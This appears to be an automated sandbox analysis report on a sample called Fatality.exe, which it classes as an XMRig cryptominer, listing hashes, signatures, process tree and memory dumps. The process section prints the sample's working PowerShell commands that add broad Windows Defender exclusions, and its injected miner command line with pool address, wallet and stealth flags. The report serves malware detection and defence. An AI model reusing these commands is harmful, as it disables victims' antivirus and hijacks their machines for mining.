Overview

overview

10

Static

static

3

Fatality.exe

windows11-21h2-x64

10

Fatality.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-01-2025 02:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fatality.exe

  • Size

    2.1MB

  • MD5

    ab637a979ba3f9e64730d0d64bf55dc7

  • SHA1

    2701c106d3b66aa75852f82dfadef0c791e7bc87

  • SHA256

    f43db369e0af2af2f1b0abb8da9963e79f21c724b65d2a59db67ca5e4379fb19

  • SHA512

    120c9af2442d107d38bde79f80445bff0862e7dde6aa8c3388f0a69061588b0baee10e4ac9cfffcdb25728823e388bc6487e2fe447c758e4dd22d4168c8b7165

  • SSDEEP

    49152:r6yNBEGdFePFvVY09GPY9YuQHz/ITi4Na:r6yv/dcbY6YzQi4Na

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 13 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fatality.exe
    "C:\Users\Admin\AppData\Local\Temp\Fatality.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3744
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:832
    • C:\Windows\System32\cmd.exe
      C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=455nttL43xofRvzTCtQ7ZX1KrU2NA26Fvci3pLMPaWzR1oD2N1nX --pass= --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=30 --tls --cinit-stealth
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    5ba388a6597d5e09191c2c88d2fdf598

    SHA1

    13516f8ec5a99298f6952438055c39330feae5d8

    SHA256

    e6b6223094e8fc598ad12b3849e49f03a141ccd21e0eaa336f81791ad8443eca

    SHA512

    ead2a2b5a1c2fad70c1cf570b2c9bfcb7364dd9f257a834eb819e55b8fee78e3f191f93044f07d51c259ca77a90ee8530f9204cbae080fba1d5705e1209f5b19

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    99c85c4e6cb151448a0a3c169876da10

    SHA1

    79e9627e9e5682d83c04d4cdf7786e5d89dcb03a

    SHA256

    3ea265fa8b84a8a0d19e2e03348c1034b144420a06dc179ce7490db25ea0329c

    SHA512

    73d4043546d701e3cb68fe737f6c8b1976f0394f6794629b8bbc9d0a783f510f857ad3cec68e4d34bc0e010c79a7cea99b00bf3c9692ce675cfd71015c699599

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlewgu2j.p42.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3744-23-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3744-1-0x00000000005A0000-0x00000000007B8000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/3744-2-0x00000000032C0000-0x00000000032D2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3744-4-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3744-0-0x00007FFE99573000-0x00007FFE99575000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3832-33-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-29-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-22-0x00000147B17C0000-0x00000147B17E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3832-20-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-47-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-19-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-24-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-46-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-26-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-17-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-28-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-25-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-27-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/3832-45-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4048-32-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4048-14-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4048-13-0x00000248E8D30000-0x00000248E8D52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4048-15-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4048-16-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4048-21-0x00007FFE99570000-0x00007FFE9A032000-memory.dmp

    Filesize

    10.8MB

    Download